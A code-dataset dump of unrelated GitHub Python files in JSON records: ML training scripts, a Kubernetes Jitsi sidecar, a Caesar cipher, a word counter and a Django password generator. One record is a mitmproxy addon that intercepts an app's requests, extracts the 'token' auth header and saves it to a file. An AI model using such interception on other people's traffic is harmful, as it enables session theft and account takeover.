self.vector2sentence(response))\r\n # file_temp.writelines(\"\\n\")\r\n\r\n seed_sets = []\r\n batch_size = context.shape[0]\r\n for b in range(batch_size):\r\n seed_set = entity[b].nonzero().view(-1).tolist()\r\n seed_sets.append(seed_set)\r\n\r\n self.model.train()\r\n self.zero_grad()\r\n\r\n scores, preds, rec_scores, rec_loss, gen_loss, mask_loss, info_db_loss, info_con_loss= \\\r\n self.model(context.to(self.device), response.to(self.device), mask_response.to(self.device), concept_mask, dbpedia_mask, seed_sets, movie, \\\r\n concept_vec, db_vec, entity_vector.to(self.device), rec, test=False)\r\n\r\n ##########################################\r\n # train_output_file.writelines(\r\n # [\"Loss per batch = %f\\n\" % gen_loss.item()])\r\n # train_output_file.writelines(['[GroundTruth] ' + ' '.join(sen_gt)+'\\n' \\\r\n # + '[Generated] ' + ' '.join(sen_gen)+'\\n\\n' \\\r\n # for sen_gt, sen_gen in zip(self.vector2sentence(response.cpu()), self.vector2sentence(preds.cpu()))])\r\n\r\n losses.append([gen_loss])\r\n self.backward(gen_loss)\r\n self.update_params()\r\n\r\n if num % 50 == 0:\r\n loss = sum([l[0] for l in losses]) / len(losses)\r\n ppl = exp(loss)\r\n logger.info('gen loss is %f, ppl is %f' % (loss, ppl))\r\n losses = []\r\n\r\n num += 1\r\n\r\n output_metrics_gen = self.val(epoch=i)\r\n _ = self.val(True, epoch=i)\r\n\r\n if best_val_gen < output_metrics_gen[\"ppl\"]:\r\n patience += 1\r\n logger.info('Patience = ', patience)\r\n if patience >= 5:\r\n gen_stop = True\r\n else:\r\n patience = 0\r\n best_val_gen = output_metrics_gen[\"ppl\"]\r\n self.model.save_model(self.opt['model_save_path'])\r\n logger.info(\r\n f\"[generator model saved in {self.opt['model_save_path']}\"\r\n \"------------------------------------------------]\")\r\n\r\n if gen_stop:\r\n break\r\n\r\n # train_output_file.close()\r\n # _ = self.val(is_test=True)\r\n\r\n def val(self, is_test=False, epoch=-1):\r\n # count是response数量\r\n self.model.eval()\r\n if is_test:\r\n valid_processed_set = self.test_processed_set\r\n else:\r\n valid_processed_set = self.valid_processed_set\r\n\r\n val_set = CRSdataset(valid_processed_set, self.opt['n_entity'],\r\n self.opt['n_concept'])\r\n val_dataset_loader = torch.utils.data.DataLoader(\r\n dataset=val_set, batch_size=self.batch_size, shuffle=False)\r\n\r\n inference_sum = []\r\n tf_inference_sum = []\r\n golden_sum = []\r\n # context_sum = []\r\n losses = []\r\n recs = []\r\n\r\n for context, c_lengths, response, r_length, mask_response, mask_r_length, \\\r\n entity, entity_vector, movie, concept_mask, dbpedia_mask, concept_vec, db_vec, rec \\\r\n in tqdm(val_dataset_loader):\r\n with torch.no_grad():\r\n seed_sets = []\r\n batch_size = context.shape[0]\r\n for b in range(batch_size):\r\n seed_set = entity[b].nonzero().view(-1).tolist()\r\n seed_sets.append(seed_set)\r\n\r\n # 使用teacher force下的回复生成,\r\n _, tf_preds, _, _, gen_loss, mask_loss, info_db_loss, info_con_loss = \\\r\n self.model(context.to(self.device), response.to(self.device), mask_response.to(self.device), concept_mask, dbpedia_mask, \\\r\n seed_sets, movie, concept_vec, db_vec, entity_vector.to(self.device), rec, test=False)\r\n\r\n # 使用greedy模式下的回复生成,限定maxlen=20?\r\n # todo\r\n scores, preds, rec_scores, rec_loss, _, mask_loss, info_db_loss, info_con_loss = \\\r\n self.model(context.to(self.device), response.to(self.device), mask_response.to(self.device), concept_mask, dbpedia_mask, \\\r\n seed_sets, movie, concept_vec, db_vec, entity_vector.to(self.device), rec, test=True, maxlen=20, bsz=batch_size)\r\n\r\n golden_sum.extend(self.vector2sentence(response.cpu()))\r\n inference_sum.extend(self.vector2sentence(preds.cpu()))\r\n # tf_inference_sum.extend(self.vector2sentence(tf_preds.cpu()))\r\n # context_sum.extend(self.vector2sentence(context.cpu()))\r\n recs.extend(rec.cpu())\r\n losses.append(torch.mean(gen_loss))\r\n #logger.info(losses)\r\n #exit()\r\n\r\n subset = 'valid' if not is_test else 'test'\r\n\r\n # 原版: gen-loss来自teacher force,inference_sum来自greedy\r\n ppl = exp(sum(loss for loss in losses) / len(losses))\r\n output_dict_gen = {'ppl': ppl}\r\n logger.info(f\"{subset} set metrics = {output_dict_gen}\")\r\n # logger.info(f\"{subset} set gt metrics = {self.metrics_gt}\")\r\n\r\n # f=open('context_test.txt','w',encoding='utf-8')\r\n # f.writelines([' '.join(sen)+'\\n' for sen in context_sum])\r\n # f.close()\r\n\r\n # 将生成的回复输出\r\n with open(f\"output/output_{subset}_gen_epoch_{epoch}.txt\",\r\n 'w',\r\n encoding='utf-8') as f:\r\n f.writelines([\r\n '[Generated] ' + re.sub('@\\d+', '__UNK__', ' '.join(sen)) +\r\n '\\n' for sen in inference_sum\r\n ])\r\n\r\n # gt shuchu\r\n with open(f\"output/output_{subset}_gt_epoch_{epoch}.txt\",\r\n 'w',\r\n encoding='utf-8') as f:\r\n for sen in golden_sum:\r\n mask_sen = re.sub('@\\d+', '__UNK__', ' '.join(sen))\r\n mask_sen = re.sub(' ([!,.?])', '\\\\1', mask_sen)\r\n f.writelines(['[GT] ' + mask_sen + '\\n'])\r\n\r\n # 将生成的回复与gt一起输出\r\n with open(f\"output/output_{subset}_both_epoch_{epoch}.txt\",\r\n 'w',\r\n encoding='utf-8') as f:\r\n f.writelines(['[GroundTruth] ' + re.sub('@\\d+', '__UNK__',' '.join(sen_gt))+'\\n' \\\r\n + '[Generated] ' + re.sub('@\\d+', '__UNK__',' '.join(sen_gen))+'\\n\\n' \\\r\n for sen_gt, sen_gen in zip(golden_sum, inference_sum)])\r\n\r\n self.save_embedding()\r\n\r\n return output_dict_gen\r\n\r\n def save_embedding(self):\r\n json.dump(loop.dict, open('output/tf_bpe2index.json', 'w'))\r\n\r\n def vector2sentence(self, batch_sen):\r\n # 一个batch的sentence 从id换成token\r\n sentences = []\r\n for sen in batch_sen.numpy().tolist():\r\n sentence = []\r\n for word in sen:\r\n if word > 3:\r\n sentence.append(self.index2word[word])\r\n elif word == 3:\r\n sentence.append('_UNK_')\r\n sentences.append(sentence)\r\n return sentences\r\n\r\n @classmethod\r\n def optim_opts(self):\r\n \"\"\"\r\n Fetch optimizer selection.\r\n\r\n By default, collects everything in torch.optim, as well as importing:\r\n - qhm / qhmadam if installed from github.com/facebookresearch/qhoptim\r\n\r\n Override this (and probably call super()) to add your own optimizers.\r\n \"\"\"\r\n # first pull torch.optim in\r\n optims = {\r\n k.lower(): v\r\n for k, v in optim.__dict__.items()\r\n if not k.startswith('__') and k[0].isupper()\r\n }\r\n try:\r\n import apex.optimizers.fused_adam as fused_adam\r\n optims['fused_adam'] = fused_adam.FusedAdam\r\n except ImportError:\r\n pass\r\n\r\n try:\r\n # https://openreview.net/pdf?id=S1fUpoR5FQ\r\n from qhoptim.pyt import QHM, QHAdam\r\n optims['qhm'] = QHM\r\n optims['qhadam'] = QHAdam\r\n except ImportError:\r\n # no QHM installed\r\n pass\r\n logger.info(optims)\r\n return optims\r\n\r\n def init_optim(self, params, optim_states=None, saved_optim_type=None):\r\n \"\"\"\r\n Initialize optimizer with model parameters.\r\n\r\n :param params:\r\n parameters from the model\r\n\r\n :param optim_states:\r\n optional argument providing states of optimizer to load\r\n\r\n :param saved_optim_type:\r\n type of optimizer being loaded, if changed will skip loading\r\n optimizer states\r\n \"\"\"\r\n\r\n opt = self.opt\r\n\r\n # set up optimizer args\r\n lr = opt['learningrate']\r\n kwargs = {'lr': lr}\r\n # kwargs['amsgrad'] = True\r\n # kwargs['betas'] = (0.9, 0.999)\r\n\r\n optim_class = self.optim_opts()[opt['optimizer']]\r\n logger.info(f'optim_class = {optim_class}')\r\n self.optimizer = optim_class(params, **kwargs)\r\n\r\n def backward(self, loss):\r\n \"\"\"\r\n Perform a backward pass. It is recommended you use this instead of\r\n loss.backward(), for integration with distributed training and FP16\r\n training.\r\n \"\"\"\r\n loss.backward()\r\n\r\n def update_params(self):\r\n \"\"\"\r\n Perform step of optimization, clipping gradients and adjusting LR\r\n schedule if needed. Gradient accumulation is also performed if agent\r\n is called with --update-freq.\r\n\r\n It is recommended (but not forced) that you call this in train_step.\r\n \"\"\"\r\n update_freq = 1\r\n if update_freq > 1:\r\n # we're doing gradient accumulation, so we don't only want to step\r\n # every N updates instead\r\n self._number_grad_accum = (self._number_grad_accum +\r\n 1) % update_freq\r\n if self._number_grad_accum != 0:\r\n return\r\n #0.1是不是太小了,原版就是这样\r\n if self.opt['gradient_clip'] > 0:\r\n torch.nn.utils.clip_grad_norm_(self.model.parameters(),\r\n self.opt['gradient_clip'])\r\n\r\n self.optimizer.step()\r\n\r\n def zero_grad(self):\r\n \"\"\"\r\n Zero out optimizer.\r\n\r\n It is recommended you call this in train_step. It automatically handles\r\n gradient accumulation if agent is called with --update-freq.\r\n \"\"\"\r\n self.optimizer.zero_grad()\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n args = setup_args().parse_args()\r\n args.log_path = args.log_path.format(args.exp_name)\r\n print(args.use_cuda)\r\n print(args.process_data)\r\n\r\n global logger\r\n logger = create_logger(args)\r\n logger.info(vars(args))\r\n\r\n loop = TrainLoop_Transformer(vars(args))\r\n if args.do_eval:\r\n loop.val(True)\r\n else:\r\n loop.train()\r\n","repo_name":"Zyh716/TG_CRS_Code","sub_path":"Conversation/Transformer/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":22708,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"34"} +{"seq_id":"70224505057","text":"\nimport mitmproxy.http\nfrom .utils import *\n\nclass leafxcy_JavaScript_ksfcys(object):\n def __init__(self,child_conn,temp_folder='temp'):\n # app\n self.app = '康师傅畅饮社'\n # result of capture\n self.res = {\n 'ksfcysToken':''\n }\n # ini\n self.count = 0\n self.table = {}\n self.toml_path = f'{temp_folder}/{self.app}.toml'\n self.child_conn = child_conn\n\n def request(self,flow: mitmproxy.http.HTTPFlow):\n # \n if self.count == 0:\n if flow.request.pretty_url.startswith('https://club.biqr.cn/'):\n headers = {k.lower():v for k,v in dict(flow.request.headers).items()}\n if 'token' in headers.keys():\n self.res['ksfcysToken'] = headers.get('token')\n # check res and save\n if all(self.res.values()):\n self.table[self.app] = [self.res]\n self.count = 1\n sendlog(self.child_conn,f'{self.app} success!'+'&&&'+dict2conf(self.res))\n save_toml(self.table,self.toml_path)\n ","repo_name":"HanEightTurtle/mitm_server_ql","sub_path":"addons/leafxcy_JavaScript_ksfcys.py","file_name":"leafxcy_JavaScript_ksfcys.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"34"} +{"seq_id":"72605160736","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 24 09:28:49 2022\n\n@author: Amirah Heng\n\"\"\"\n\nimport os\nimport pickle\nimport datetime\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom tensorflow.keras.utils import plot_model\nfrom sklearn.preprocessing import MinMaxScaler\nfrom tensorflow.keras.callbacks import TensorBoard\nfrom Malaysia_Covid_Case_Module import ModelEvaluation,EDA\nfrom sklearn.metrics import mean_absolute_percentage_error\nfrom sklearn.metrics import mean_absolute_error,mean_squared_error\nfrom Malaysia_Covid_Case_Module import ModelCreation, ModelAnalysis\n#%%Statics\n\nlog_dir = datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\nLOG_PATH = os.path.join(os.getcwd(),'logs', log_dir)\nTRAIN_PATH= os.path.join(os.getcwd(),'dataset','cases_malaysia_train.csv')\nTEST_PATH = os.path.join(os.getcwd(),'dataset','cases_malaysia_test.csv')\nMMS_PATH= os.path.join(os.getcwd(),'model', 'mms.pkl')\nMODEL_SAVE_PATH = os.path.join(os.getcwd(),'model','model.h5')\n#%% STEP 1 - Data Loading\n\ndf = pd.read_csv(TRAIN_PATH)\n\n#%% STEP 2 - Data Inspection\n\ndf.info() #There are 30 columns in this data \ndf.tail(10) #679 dataset available in this\n\n#Describe data mean,median, IQR\ntemp= df.describe().T \n\n#Change all cases to float data\nfor i in df.columns:\n df[i]=pd.to_numeric(df[i],errors='coerce')\n\n#Plot graphs\nEDA().plot_graph(df)\n\n#Check for missing datas/NaN values\ndf.isna().sum() #There are 342 missing datas from cluster_import ,cluster_religious,\n# cluster_community , cluster_education ,cluster_detentionCentre , cluster_workplace \n \ndf.duplicated().sum() #no duplicated data in this dataset\n\n#Check for outliers\ndf.boxplot(figsize=(40,15)) #Cases_active\n\n#%% STEP 3 - Data Cleaning\n\n#Interpolate data to fill in NaN values\ndf.isna().sum() \n\n#cases_new data shows a degree 3 wave graph hence polynomial degree 3 is used to interpolate\ndf['cases_new'].interpolate(method='polynomial', order=2, inplace=True)\n\ndf['cases_new'].isna().sum()\n#Plot graph for target column\n# EDA().plot_covid_data(column_names, dataset=df['cases_new'])\n \nplt.figure()\nplt.plot(df['cases_new'])\nplt.xlabel('cases_new')\nplt.show()\n\n\n#%% STEP 4 - Features Selection\n#Cases new will be the selected data for this model\n#%% STEP 5 - Preprocessing\n\nmms = MinMaxScaler()\ndf = mms.fit_transform(np.expand_dims(df['cases_new'],axis=-1))\n\n#Create a container to develop model\nX_train = []\ny_train = []\n\nwin_size = 30\n\nfor i in range(win_size, np.shape(df)[0]):\n X_train.append(df[i-win_size:i, 0])\n y_train.append(df[i, 0])\n\nX_train = np.array(X_train) \ny_train = np.array(y_train) \n\n\n#%% STEP 6 - Model Development\n# USE LSTM layers, dropout, dense, input\n\nnb_features=np.shape(X_train)[1] #30\n\nMC= ModelCreation()\nmodel = MC.simple_lstm_layer(nb_features,num_node=64,drop_rate=0.2,\n output_node=1)\n\n#%% STEP 7) MODEL ANALYSIS\n\n#Show model architecture\nplot_model(model,show_layer_names=(True), show_shapes=(True))\n\n#compile model \nmodel.compile(optimizer='adam', loss='mse', metrics ='mape')\n\nX_train = np.expand_dims(X_train, axis=-1) #(30,1)\n\n#callbacks\ntensorboard_callback= TensorBoard(log_dir=LOG_PATH)\n\n#Train and test model created\nhist= model.fit(X_train, y_train, batch_size=20, epochs=200,\n callbacks=tensorboard_callback)\n\n# Evaluate model loss and mape in graph plot\nMA= ModelAnalysis()\nMA.PlotHistory(hist)\n\n#%% STEP 8 - Model Evaluation\n\ntest_df = pd.read_csv(TEST_PATH)\n\n#Change cases_new to float data\ntest_df.iloc[:,1]=pd.to_numeric(test_df.iloc[:,1],errors='coerce')\n\n#There is 1 NaN in test dataset\ntest_df.isna().sum()\n\n#Interpolate data to remove NaN\ntest_df['cases_new'].interpolate(method='polynomial', order=2,inplace=True)\n\ntest_df = mms.transform(np.expand_dims(test_df.iloc[:,1],axis=-1))\n\n# Concatenate test_df + df \ncon_test = np.concatenate((df,test_df),axis=0)\ncon_test = con_test[-(win_size+len(test_df)):] \n\nplt.figure()\nplt.plot(test_df)\nplt.show()\n\nX_test =[]\nfor i in range(win_size, len(con_test)): #(30,130)\n X_test.append(con_test[i-win_size:i , 0])\n \n#1st iteration ---> i=30 get first 30days of data\n#2nd iteration ---> i=31 get next 30days of data\n#first row of data can predict next row of data\n\nX_test = np.array(X_test)\npredicted= model.predict(np.expand_dims(X_test,axis=-1))\n\ntest_df_inverse=mms.inverse_transform(test_df)\n\npredicted_inverse = mms.inverse_transform(predicted)\n\n#%%Plotting of graphs\n\nME= ModelEvaluation()\nME.plot_predicted_graph(test_df,predicted)\n\n#%% MAPE value\n\nprint(\"The mean_absolute_percentage_error(MAPE) value is:\",mean_absolute_percentage_error(test_df_inverse, predicted_inverse))\nprint(\"The mean_squared_error: value is\", mean_squared_error(test_df_inverse, predicted_inverse))\nprint(\"The mean_absolute_error: value is\", mean_absolute_error(test_df_inverse, predicted_inverse))\n\n# print((mean_absolute_error(test_df, predicted)/sum(abs(test_df))) *100)\n#%% Step 9) Model Saving\n\n#Save Model\nmodel.save(MODEL_SAVE_PATH)\n#Save scaler model\nwith open(MMS_PATH, 'wb') as file:\n pickle.dump(mms, file)\n\n#%% Discussion)\n\n# The MAPE value achieved is 0.11 which is high in performance\n# A simple LSTM, Dense, and Dropout layers is implemented in this model.\n# The MAPE loss can be further reduced in the future with some suggested approach:\n # 1) Increasing number of samples in the dataset\n # 2) Increasing the number of epochs\n # 3) Introduce different model architectures \n\n# A simple Long Short-Term Memory (LSTM) model is implemented with\n# with an input layer, a single hidden (LSTM) layer, and an output layer \n# that is used to make a prediction. The input layer has neurons equal to 30\n# sequence steps (for 30 days COVID-19 data points). \n# The hidden layer is an LSTM layer with 64 hidden units (neurons) \n# and a rectified linear unit (ReLU) as an activation function. \n# The output layer had a dense layer with 1 unit for predicting the output. \n# Moreover, we have set 300 as the number of epochs, Adam as the optimizer, \n# and the mape as the loss function. \n# After that, we fit the model with prepared data to make a prediction. \n# The obtained results may vary given the stochastic nature of the LSTM model; \n# therefore, we have run it several times. \n# Finally, we enter the last sequence with output to forecast the next value in the series.\n\n\n","repo_name":"hengamirah/Malaysia_Covid_Cases_Prediction","sub_path":"Malaysia_Covid_Case_Prediction.py","file_name":"Malaysia_Covid_Case_Prediction.py","file_ext":"py","file_size_in_byte":6317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15948451144","text":"#!/usr/bin/env python3\n\"\"\"\nThis script is meant to run as a sidecar-container on a jvb pod.\nIt updates the pod deletion cost annotation based on the number of\nparticipants on the JVB.\n\nFor more information on Pod deletion cost, see:\nhttps://kubernetes.io/docs/concepts/workloads/controllers/replicaset/#pod-deletion-cost\n\"\"\"\n\nimport json\nimport logging\nimport os\nimport time\nimport signal\nfrom ssl import create_default_context\nimport sys\nfrom urllib import request\n\n# Time to wait between each jvb status check\nfrom urllib.error import HTTPError, URLError\n\nupdate_period_seconds = os.getenv(\"UPDATE_PERIOD_SECONDS\", 60)\n\n# -- JVB\n# URL to colibri API\n# https://github.com/jitsi/jitsi-videobridge/blob/master/doc/rest-colibri.md\ncolibri_api = os.getenv(\n \"COLIBRI_API\", \"http://127.0.0.1:8080/colibri/stats\"\n)\n\n# -- Kubernetes\n# URL to reach Kubernetes' API\nk8s_api = os.getenv(\"K8S_API\", \"https://kubernetes.default.svc\")\n# Path to ServiceAccount token\nservice_account_directory = os.getenv(\n \"K8S_SA_DIRECTORY\", \"/var/run/secrets/kubernetes.io/serviceaccount\"\n)\n\n# Reference the internal certificate authority (CA)\ncacert = f\"{service_account_directory}/ca.crt\"\n\n# Service account Bearer token\nbearer = open(f\"{service_account_directory}/token\", \"r\").read()\n\n# Current pod namespace\nnamespace = open(f\"{service_account_directory}/namespace\", \"r\").read()\npod_name = os.getenv(\"HOSTNAME\")\n\n# Exit gracefully if SIGTERM signal is sent\ndef sigterm_handler(_signo, _stack_frame):\n \"\"\"Exit gracefully.\"\"\"\n sys.exit(0)\nsignal.signal(signal.SIGTERM, sigterm_handler)\n\n\ndef get_colibri_stats():\n \"\"\"Call Colibri API and return stats.\"\"\"\n response = request.urlopen(colibri_api)\n if response.getcode() != 200:\n raise HTTPError(colibri_api, response.getcode(), \"Unexpected response code\", {}, None)\n return json.load(response)\n\n\ndef update_pod_metadata(pod_deletion_cost):\n \"\"\"\n Call Kubernetes API to update the status label and the pod deletion\n cost annotation.\n \"\"\"\n json_patch = json.dumps({\n \"metadata\": {\n \"annotations\": {\n \"controller.kubernetes.io/pod-deletion-cost\": str(pod_deletion_cost)\n }\n }\n })\n url = f\"{k8s_api}/api/v1/namespaces/{namespace}/pods/{pod_name}\"\n headers = {\n \"Authorization\": f\"Bearer {bearer}\",\n \"Content-Type\": \"application/merge-patch+json\",\n \"Accept\": \"application/json\",\n }\n ssl_context = create_default_context()\n ssl_context.load_verify_locations(cacert)\n patch_request = request.Request(\n url, data=json_patch.encode(), headers=headers, method=\"PATCH\"\n )\n response = request.urlopen(patch_request, context=ssl_context)\n if response.getcode() != 200:\n raise HTTPError(colibri_api, response.getcode(), \"Unexpected response code\", headers, None)\n\n\ndef get_pod_deletion_cost(stats):\n \"\"\"\n Given colibri stats, this function returns the number of participants on this JVB, \n which represents the cost of deleting this pod. Pods with lower deletion cost are \n preferred to be deleted before pods with higher deletion cost.\n \"\"\"\n total_participants = stats.get(\"participants\", 0)\n external_participants = stats.get(\"octo_endpoints\", 0)\n\n return total_participants - external_participants\n\n\n# Initialize logger\nlogging.basicConfig(\n format=\"[%(asctime)s][%(levelname)s] %(message)s\", level=logging.INFO\n)\n\n# This variable will contain the pod deletion cost\npod_deletion_cost = None\n\nwhile True:\n try:\n colibri_stats = get_colibri_stats()\n new_pod_deletion_cost = get_pod_deletion_cost(colibri_stats)\n except (URLError, HTTPError):\n logging.exception(\"Unable to get colibri stats\")\n new_pod_deletion_cost = pod_deletion_cost\n\n if new_pod_deletion_cost != pod_deletion_cost:\n try:\n update_pod_metadata(new_pod_deletion_cost)\n logging.info(\"pod-deletion-cost annotation updated to %s\", new_pod_deletion_cost)\n pod_deletion_cost = new_pod_deletion_cost\n except (FileNotFoundError, HTTPError, URLError):\n logging.exception(\"Unable to update pod metadata\")\n time.sleep(update_period_seconds)\n","repo_name":"openfun/jitsi-k8s","sub_path":"k8s/base/jvb-metadata-updater.py","file_name":"jvb-metadata-updater.py","file_ext":"py","file_size_in_byte":4195,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"34"} +{"seq_id":"75069345378","text":"def get_counts(file_name): \n\n dictionary = dict() #Empty dictionary\n \n file = open(file_name,'r') #Open files and put it in read mode\n \n count = 0 #The count variable, used to count how many words there are\n \n for line in file: \n text = file.read() #This takes the whole text itself\n raw_words = text.split() #This splits it into words\n \n for i in range(0, len(raw_words)): #Looping from 0 to \n words = raw_words[i].lower()\n if words in dictionary: #If the words are already in the dictionary, I added one to it\n dictionary[words] = dictionary[words] + 1\n count = count + 1 \n else:\n dictionary[words] = 1 #If the words are not in the dictionary, I make a new element and make it equal to one.\n count = count + 1 \n \n\n dictionary.update({'_total': count}) #Adds the last element \"Total\" into the dictionary with the amount of words\n \n print (dictionary) #Prints out the dictionary, to see how frequently used each words are\n \n file.close() #Closes file\n\nget_counts(\"hamlet-short.txt\") \n\n \n \n\n\n\n\n\n\n \n\n\n\n\n\n\n\n\n\n","repo_name":"cs-richardson/whosaiditpart1-2-tle21","sub_path":"Who Said It? .py","file_name":"Who Said It? .py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9508066722","text":"# eingabe des zu versschlüsselnden Textes\nklartext = str(input('Gib ein Wort ein:'))\n# definieren der variable geheimtext\ngeheimtext = ''\n# schleife für string klartext\nfor zeichen in klartext:\n # ascii zahlencode abspeichern\n zahl = ord(zeichen)\n # ascii des neuen buchstabens\n neuezahl = zahl + 3\n # wenn neue zahl über Z ist\n if neuezahl > 90:\n # anderes ende des Alphabets\n neuezahl = neuezahl - 26\n # ascii zu buchstabe\n neueszeichen = chr(neuezahl)\n # geheimtext erweitern mit verschlüsseltem buchstaben\n geheimtext = geheimtext + neueszeichen\n# ausgabe des endtextes\nprint(geheimtext)","repo_name":"MarcoZ05/PY_11.2","sub_path":"14.02.22 AB Verschlüsselung, A7.py","file_name":"14.02.22 AB Verschlüsselung, A7.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12679520101","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.contrib import messages\nimport string\nimport random\nimport subprocess \nimport clipboard\n\n# Create your views here.\n\ndef index(request):\n return render(request, \"index.html\")\n\ndef home(request):\n return render(request, \"index.html\")\n\ndef copy(request, ena):\n data1 = ena\n print(data1)\n clipboard.copy(data1)\n messages.success(request, \" Your password coppied successfully\")\n return render(request, \"result2.html\")\n\ndef gen(request):\n\n if request.method == \"POST\":\n len = request.POST.get('length')\n\n upper = request.POST.get('uppercase', 'off')\n lower = request.POST.get('lowerercase', 'off')\n punc = request.POST.get('Punctions', 'off')\n digit = request.POST.get('digit', 'off')\n plen = len\n count = 0\n final = []\n\n if upper == \"on\":\n \n sU = string.ascii_uppercase\n #sU = list(su)\n #sU = random.shuffle(sU)\n result1 = []\n result1.extend(list(sU))\n random.shuffle(result1)\n result = (\"\".join(result1[0:1]))\n final = result\n count = count + 1\n\n if lower == \"on\":\n sL = string.ascii_lowercase\n result2 = []\n result2.extend(list(sL))\n random.shuffle(result2)\n result = (\"\".join(result2[0:1]))\n if final == []:\n final = result\n else:\n final = final + result\n #final.extend(list(result))\n count = count + 1\n\n if punc == \"on\":\n sP = string.punctuation\n result3 = []\n result3.extend(list(sP))\n random.shuffle(result3)\n result = (\"\".join(result3[0:1]))\n if final == []:\n final = result\n else:\n final = final + result\n count = count + 1\n\n if digit == \"on\":\n sD = string.digits\n result4 = []\n result4.extend(list(sD))\n random.shuffle(result4)\n result = (\"\".join(result4[0:1]))\n if final == []:\n final = result\n else:\n final = final + result\n count = count + 1\n\n sonkha = int(plen) - count\n\n #listToStr = ' '.join(map(str, s))\n\n while count >= 1:\n s1 = string.ascii_lowercase\n s2 = string.ascii_uppercase\n s3 = string.digits\n s4 = string.punctuation\n s = []\n s.extend(list(s1))\n s.extend(list(s2))\n s.extend(list(s3))\n s.extend(list(s4))\n random.shuffle(s)\n #p = (\"\".join(random.sample(s, plen)))\n p = (\"\".join(s[0:int(sonkha)]))\n lol = final + p\n params = {'purpose': 'Generated Password', 'ana': lol}\n\n return render(request, \"result.html\", params)\n else:\n s1 = string.ascii_lowercase\n s2 = string.ascii_uppercase\n s3 = string.digits\n s4 = string.punctuation\n s = []\n s.extend(list(s1))\n s.extend(list(s2))\n s.extend(list(s3))\n s.extend(list(s4))\n random.shuffle(s)\n\n #p = (\"\".join(random.sample(s, plen)))\n p = (\"\".join(s[0:int(plen)]))\n data1 = p\n\n #print(p)\n params = {'purpose': 'Generated Password', 'ana': p}\n\n return render(request, \"result.html\", params)\n\n\n return render(request, \"index.html\")\n","repo_name":"MdAbdulMalek/Password-Generator-Using-Django","sub_path":"passwordGenerator/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32663355256","text":"#!/usr/bin/env python\nimport argparse\nimport os.path as osp\nimport logging\nimport time\nimport sys\nsys.path.insert(0, osp.dirname(__file__) + '/..')\n\nimport torch\nimport torch.nn as nn\n\nfrom pointmvsnet.config import load_cfg_from_file\nfrom pointmvsnet.utils.io import mkdir\nfrom pointmvsnet.utils.logger import setup_logger\nfrom pointmvsnet.utils.torch_utils import set_random_seed\nfrom pointmvsnet.model import build_pointmvsnet as build_model\nfrom pointmvsnet.solver import build_optimizer, build_scheduler\nfrom pointmvsnet.utils.checkpoint import Checkpointer\nfrom pointmvsnet.dataset import build_data_loader\nfrom pointmvsnet.utils.tensorboard_logger import TensorboardLogger\nfrom pointmvsnet.utils.metric_logger import MetricLogger\nfrom pointmvsnet.utils.file_logger import file_logger\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description=\"PyTorch Point-MVSNet Training\")\n parser.add_argument(\n \"--cfg\",\n dest=\"config_file\",\n default=\"\",\n metavar=\"FILE\",\n help=\"path to config file\",\n type=str,\n )\n parser.add_argument(\n \"opts\",\n help=\"Modify config options using the command-line\",\n default=None,\n nargs=argparse.REMAINDER,\n )\n\n args = parser.parse_args()\n return args\n\n\ndef train_model(model,\n loss_fn,\n metric_fn,\n image_scales,\n inter_scales,\n isFlow,\n data_loader,\n optimizer,\n curr_epoch,\n tensorboard_logger,\n log_period=1,\n output_dir=\"\",\n ):\n logger = logging.getLogger(\"pointmvsnet.train\")\n meters = MetricLogger(delimiter=\" \")\n model.train()\n end = time.time()\n total_iteration = data_loader.__len__()\n path_list = []\n\n for iteration, data_batch in enumerate(data_loader):\n data_time = time.time() - end\n curr_ref_img_path = data_batch[\"ref_img_path\"]\n path_list.extend(curr_ref_img_path)\n data_batch = {k: v.cuda(non_blocking=True) for k, v in data_batch.items() if isinstance(v, torch.Tensor)}\n\n preds = model(data_batch, image_scales, inter_scales, isFlow)\n optimizer.zero_grad()\n\n loss_dict = loss_fn(preds, data_batch, isFlow)\n metric_dict = metric_fn(preds, data_batch, isFlow)\n losses = sum(loss_dict.values())\n meters.update(loss=losses, **loss_dict, **metric_dict)\n\n losses.backward()\n\n optimizer.step()\n\n batch_time = time.time() - end\n end = time.time()\n meters.update(time=batch_time, data=data_time)\n\n if iteration % log_period == 0:\n logger.info(\n meters.delimiter.join(\n [\n \"EPOCH: {epoch:2d}\",\n \"iter: {iter:4d}\",\n \"{meters}\",\n \"lr: {lr:.2e}\",\n \"max mem: {memory:.0f}\",\n ]\n ).format(\n epoch=curr_epoch,\n iter=iteration,\n meters=str(meters),\n lr=optimizer.param_groups[0][\"lr\"],\n memory=torch.cuda.max_memory_allocated() / (1024.0 ** 2),\n )\n )\n tensorboard_logger.add_scalars(loss_dict, curr_epoch * total_iteration + iteration, prefix=\"train\")\n tensorboard_logger.add_scalars(metric_dict, curr_epoch * total_iteration + iteration, prefix=\"train\")\n\n if iteration % (100 * log_period) == 0:\n file_logger(data_batch, preds, curr_epoch * total_iteration + iteration, output_dir, prefix=\"train\")\n\n return meters\n\n\ndef validate_model(model,\n loss_fn,\n metric_fn,\n image_scales,\n inter_scales,\n isFlow,\n data_loader,\n curr_epoch,\n tensorboard_logger,\n log_period=1,\n output_dir=\"\",\n ):\n logger = logging.getLogger(\"pointmvsnet.validate\")\n meters = MetricLogger(delimiter=\" \")\n model.train()\n end = time.time()\n total_iteration = data_loader.__len__()\n with torch.no_grad():\n for iteration, 